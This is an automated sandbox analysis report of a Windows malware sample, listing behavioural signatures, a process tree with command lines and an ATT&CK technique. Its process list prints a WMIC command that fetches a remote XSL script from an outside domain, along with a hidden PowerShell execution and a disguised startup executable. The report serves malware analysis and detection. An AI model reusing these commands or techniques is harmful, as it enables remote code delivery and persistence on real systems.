Resubmissions
- 13-11-2019 07:33  191113-s6xvalyd5a  0
- 12-11-2019 15:34  191112-9te2mt6rbs  0
- 04-11-2019 16:22  191104-pvpshym7va  0

Analysis
- max time kernel: 145s
- max time network: 150s
- resource: win10v191014

General
- Target: test.zip
- Sample: 191113-s6xvalyd5a
- SHA256: 72b228f51cf5a1b7600f0e0848145e4e54e54838977a5a5b1c85f69b64b92cf5
- Score: N/A

Malware Config
Signatures
- Suspicious use of WriteProcessMemory (8 IoCs)

  description                       pid   Process            procid_target
  PID 5048 wrote to memory of 2016  5048  msiexec.exe        76
  PID 3164 wrote to memory of 3680  3164  SppExtComObj.exe   79
  PID 2016 wrote to memory of 4656  2016  MsiExec.exe        80
  PID 5048 wrote to memory of 4668  5048  msiexec.exe        82
  PID 4656 wrote to memory of 4700  4656  WMIC.exe           83
  PID 4668 wrote to memory of 4276  4668  MsiExec.exe        85
  PID 4700 wrote to memory of 4836  4700  powershell.exe     87
  PID 4836 wrote to memory of 4900  4836  nvsmartmaxapp.exe  88

- Suspicious behavior: EnumeratesProcesses (3 IoCs)

  pid   Process
  5048  msiexec.exe
  4700  powershell.exe
  4900  wmplayer.exe

- Checks system information in the registry (likely anti-VM) (2 TTPs, 2 IoCs)

  description        ioc                                                                                  pid   Process
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer  3820  svchost.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName   3820  svchost.exe

- Windows security modification (2 IoCs)

  description      ioc                                                              pid   Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0"  4160  svchost.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1"  4160  svchost.exe

- Suspicious use of FindShellTrayWindow (1 IoCs)

  pid   Process
  4968  msiexec.exe

- Suspicious use of AdjustPrivilegeToken (55 IoCs)

- Loads dropped DLL (3 IoCs)

  pid   Process
  4668  MsiExec.exe
  4836  nvsmartmaxapp.exe
  4900  wmplayer.exe

- Uses Volume Shadow Copy WMI provider (3 IoCs)

  description  ioc                                                                                                                                         pid   Process
  Key opened   \Registry\Machine\Software\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}                                                              4700  powershell.exe
  Key queried  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}                                                              4700  powershell.exe
  Key opened   \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}  4700  powershell.exe

- Discovering connected drives (3 TTPs, 1 IoCs)

  description             ioc     pid   Process
  File opened (read-only) \??\C:  4968  msiexec.exe

- Executes dropped EXE (2 IoCs)

  pid   Process
  4276  lcADA5.tmp
  4836  nvsmartmaxapp.exe

- Uses Volume Shadow Copy Service COM API (3 IoCs)

  description  ioc                                                                                                                                         pid   Process
  Key opened   \Registry\Machine\Software\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}                                                              4700  powershell.exe
  Key queried  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}                                                              4700  powershell.exe
  Key opened   \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}  4700  powershell.exe

- Drops startup file (1 IoCs)

  description   ioc                                                                                             pid   Process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvsmartmaxapp.lnk  4700  powershell.exe

- Drops file in system dir (40 IoCs)

- Uses Task Scheduler COM API (1 TTPs, 19 IoCs)

Processes
- C:\Windows\system32\msiexec.exe
  Command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
  PID: 4968
  Signatures:
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of AdjustPrivilegeToken
  - Discovering connected drives

- C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  PID: 5048
  Signatures:
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Drops file in system dir

- \??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
  PID: 5056

- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
  PID: 5116

- C:\Windows\System32\MsiExec.exe
  Command line: C:\Windows\System32\MsiExec.exe -Embedding F6DCE9C4CAD94F49E07D376778777BF2
  PID: 2016
  Signatures:
  - Suspicious use of WriteProcessMemory

- C:\Windows\system32\SppExtComObj.exe
  Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
  PID: 3164
  Signatures:
  - Suspicious use of WriteProcessMemory

- C:\Windows\System32\SLUI.exe
  Command line: "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
  PID: 3680

- C:\Windows\System32\Wbem\WMIC.exe
  Command line: "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
  PID: 4656
  Signatures:
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken

- C:\Windows\syswow64\MsiExec.exe
  Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 5EC4B6F756F08EB7BF50059B493CC3A2
  PID: 4668
  Signatures:
  - Suspicious use of WriteProcessMemory
  - Loads dropped DLL

- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
  PID: 4700
  Signatures:
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Uses Volume Shadow Copy WMI provider
  - Uses Volume Shadow Copy Service COM API
  - Drops startup file
  - Uses Task Scheduler COM API

- C:\Users\Admin\AppData\Local\Temp\lcADA5.tmp
  Command line: "C:\Users\Admin\AppData\Local\Temp\lcADA5.tmp"
  PID: 4276
  Signatures:
  - Executes dropped EXE

- C:\Users\Admin\AppData\Roaming\WFKhm\nvsmartmaxapp.exe
  Command line: "C:\Users\Admin\AppData\Roaming\WFKhm\nvsmartmaxapp.exe"
  PID: 4836
  Signatures:
  - Suspicious use of WriteProcessMemory
  - Loads dropped DLL
  - Executes dropped EXE

- C:\Program Files (x86)\Windows Media Player\wmplayer.exe
  Command line: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
  PID: 4900
  Signatures:
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Loads dropped DLL

- \??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k netsvcs -s BITS
  PID: 4724
  Signatures:
  - Drops file in system dir

- \??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
  PID: 4372

- \??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
  PID: 3820
  Signatures:
  - Checks system information in the registry (likely anti-VM)

- \??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k unistacksvcgroup
  PID: 548

- \??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
  PID: 4160
  Signatures:
  - Windows security modification

Network
MITRE ATT&CK Enterprise v15
MITRE ATT&CK Additional techniques
- T1089